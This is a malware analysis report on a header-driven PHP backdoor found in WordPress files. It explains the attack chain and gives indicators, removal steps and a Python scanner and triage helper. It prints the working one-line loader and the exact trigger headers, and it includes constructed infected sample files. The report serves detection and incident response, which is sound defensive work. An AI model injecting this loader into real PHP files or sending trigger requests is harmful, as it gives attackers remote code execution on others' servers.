Technical Analysis
The malware is a 'Header-Based Backdoor': a one-line loader injected at the top of PHP files, immediately after the opening '<?php' tag. The file itself contains no eval(), create_function() or base64_decode() call. Those names arrive in HTTP request headers, and the loader invokes whatever function name each header carries. In the sample, 'X-Dns-Prefetch-Control' supplies the function factory (expected to be 'create_function', which compiles a string of PHP into a callable), 'If-Unmodified-Since' supplies the decoder (expected to be 'base64_decode'), and 'Feature-Policy' carries the base64-encoded PHP payload. All three are real header names ('Feature-Policy' and 'X-Dns-Prefetch-Control' are normally response headers, 'If-Unmodified-Since' a request header), so the trigger request blends into ordinary traffic. Because the payload is never written to disk, only the short loader stub is present in the file, and signature scanners that look for the usual eval/base64 strings miss it. Two caveats for analysts: getallheaders() is not available on every SAPI (Apache and FastCGI have it, PHP-FPM since 7.3), and create_function() was removed in PHP 8.0, so on PHP 8 the attacker has to send a different factory name, which the header-driven design allows since nothing is hard-coded.
VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.
Attack Chain
- A request is sent carrying three headers: 'X-Dns-Prefetch-Control' (function-factory name), 'If-Unmodified-Since' (decoder name) and 'Feature-Policy' (encoded payload).
- The loader calls getallheaders() and checks only for 'X-Dns-Prefetch-Control' with isset(); the other two headers are read without any check, so a request that carries the trigger but omits them produces a PHP error instead of execution.
- The value of 'X-Dns-Prefetch-Control' is called as a function with two arguments, an empty parameter list and the decoded payload, i.e. create_function('', base64_decode(<Feature-Policy>)) in the expected case. The returned callable is stored in $mb_convert and invoked, executing the attacker's PHP with the web server's privileges.
Code Signature(s)
FILE: sample.php
$_HEADERS = getallheaders();                       // every request header, name => value
if (isset($_HEADERS['X-Dns-Prefetch-Control'])) {  // trigger: only this header is checked
    // header value used as a function name: factory('', decoder(payload)),
    // i.e. create_function('', base64_decode(<Feature-Policy>)) in the expected case
    $mb_convert = $_HEADERS['X-Dns-Prefetch-Control']('', $_HEADERS['If-Unmodified-Since']($_HEADERS['Feature-Policy']));
    $mb_convert();                                 // run the freshly compiled payload
}
Indicators of Compromise (IOCs)
- Request header 'X-Dns-Prefetch-Control' carrying a PHP function name (expected: create_function)
- Request header 'If-Unmodified-Since' carrying a function name instead of an HTTP date (expected: base64_decode)
- Request header 'Feature-Policy' carrying a base64-encoded PHP payload
- PHP files whose first statement after '<?php' is $_HEADERS=getallheaders(); followed by a header value called as a function
Removal Protocol
- Scan all PHP files, not only active themes and plugins (inactive plugin and theme files under wp-content are still reachable by direct URL), for the loader: list files that call getallheaders() and inspect each hit for a header value used as a function name, e.g. grep -rlE 'getallheaders\(\)' --include='*.php' . and then review the matches.
- Remove the injected line from the top of each affected file, preferably by restoring the file from a clean copy of the theme or plugin, and confirm the '<?php' tag and the rest of the file are intact.
- Treat the loader as persistence, not as the entry point: look for the vulnerable plugin or theme, compromised FTP/SFTP or admin credentials, other web shells and rogue administrator users, and rotate all credentials.
- Update WordPress, themes, and plugins to the latest versions. Updating does not remove an already injected loader, and moving to PHP 8 only disables the create_function() path, not the header-driven design.
- Block and log requests whose 'If-Unmodified-Since' value is not an HTTP date or that carry 'Feature-Policy' as a request header; both are cheap WAF rules for this family.
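Two checks for the attack chain and removal steps above, as an added example that is not part of the original report or its author's tooling: scan_php() finds the loader shape in PHP source, generalised beyond the sample to any header name and to the $_SERVER['HTTP_*'] form on the assumption that variants keep the same structure but rename headers, and triage_request() resolves what a captured request would make the loader do without executing it. The sample files, the request and its payload are constructed for this example; only the three header names come from the page.

```python
"""Triage helpers for the header-based PHP loader described above.

Added example, not code from the page or its author. The regexes, the
constructed sample files and the constructed request are assumptions made
for illustration; the three default header names match the sample on the page.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# A variable that receives getallheaders():  $_HEADERS=getallheaders();
HEADER_VAR_RE = re.compile(r"\$(\w+)\s*=\s*getallheaders\s*\(\s*\)")

# A header value invoked as a function:  $_HEADERS['X-Foo'](  or  $_SERVER['HTTP_X_FOO'](
# The header name is captured so the scanner is not tied to the three names in
# the sample (assumption: variants keep the loader shape but rename the headers).
CALLED_INDEX_RE = re.compile(r"""\$(\w+)\s*\[\s*['"]([A-Za-z0-9_-]+)['"]\s*\]\s*\(""")


def scan_php(source: str) -> List[Tuple[str, str]]:
    """Return (variable, header) pairs where an HTTP header value is called as a
    PHP function. An empty list means the loader shape was not found."""
    header_vars = set(HEADER_VAR_RE.findall(source))
    hits = []
    for var, key in CALLED_INDEX_RE.findall(source):
        if var in header_vars or (var == "_SERVER" and key.startswith("HTTP_")):
            hits.append((var, key))
    return hits


def triage_request(headers: Dict[str, str],
                   factory_header: str = "X-Dns-Prefetch-Control",
                   decoder_header: str = "If-Unmodified-Since",
                   payload_header: str = "Feature-Policy") -> Optional[Tuple[str, str, str]]:
    """Resolve what the loader would do for a captured request, without running it.

    Returns (factory function, decoder function, decoded payload), or None when the
    trigger header is absent (mirrors the loader's isset() check). Only base64_decode
    is emulated; any other decoder name leaves the payload as received."""
    if factory_header not in headers:
        return None
    factory = headers[factory_header]          # e.g. create_function('', code) == eval-like
    decoder = headers.get(decoder_header, "")
    raw = headers.get(payload_header, "")
    if decoder == "base64_decode":
        # PHP's base64_decode tolerates missing padding; pad so Python does too.
        padded = raw + "=" * (-len(raw) % 4)
        payload = base64.b64decode(padded).decode("utf-8", "replace")
    else:
        payload = raw
    return factory, decoder, payload


# Constructed sample files (not taken from any real site).
SAMPLE_INFECTED = (
    "<?php $_HEADERS=getallheaders();if(isset($_HEADERS['X-Dns-Prefetch-Control']))"
    "{$mb_convert=$_HEADERS['X-Dns-Prefetch-Control']('', $_HEADERS['If-Unmodified-Since']"
    "($_HEADERS['Feature-Policy']));$mb_convert();}\n"
    "/* legitimate theme code follows */\n"
)
SAMPLE_RENAMED = (  # same loader, attacker-chosen header names, double-quoted key
    "<?php $h=getallheaders();if(isset($h['X-Cache-Key'])){$f=$h[\"X-Cache-Key\"]('',"
    "$h['Accept-Datetime']($h['X-Request-Context']));$f();}\n"
)
SAMPLE_SERVER = (  # $_SERVER variant, no getallheaders() at all
    "<?php if(isset($_SERVER['HTTP_X_TOKEN'])){$_SERVER['HTTP_X_TOKEN']($_SERVER['HTTP_X_DATA']);}\n"
)
SAMPLE_CLEAN = (  # legitimate use of getallheaders(): value read, never called
    "<?php\n$headers = getallheaders();\n"
    "if (isset($headers['Authorization'])) {\n"
    "    $token = substr($headers['Authorization'], 7);\n}\n"
)

# Constructed trigger request for the page's sample; the payload is a harmless marker.
SAMPLE_PAYLOAD = "echo 'header-backdoor-test';"
SAMPLE_REQUEST = {
    "Host": "victim.example",
    "X-Dns-Prefetch-Control": "create_function",
    "If-Unmodified-Since": "base64_decode",
    "Feature-Policy": base64.b64encode(SAMPLE_PAYLOAD.encode()).decode(),
}

if __name__ == "__main__":
    for name, src in [("infected", SAMPLE_INFECTED), ("renamed", SAMPLE_RENAMED),
                      ("server", SAMPLE_SERVER), ("clean", SAMPLE_CLEAN)]:
        print(f"{name}: {scan_php(src) or 'no header-call pattern'}")
    print(triage_request(SAMPLE_REQUEST))
```

scan_php() keys on the structure (a header value in call position) rather than on the header names or on the strings create_function/base64_decode, which is what the loader is designed to avoid leaving in the file; run it over every .php file under the web root, including inactive themes and plugins. triage_request() is for incident response on captured traffic: it tells you which factory and decoder the request named and what PHP would have run, without ever evaluating it.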
Status: Active Threat.
Verification: Verified by MD Pabel.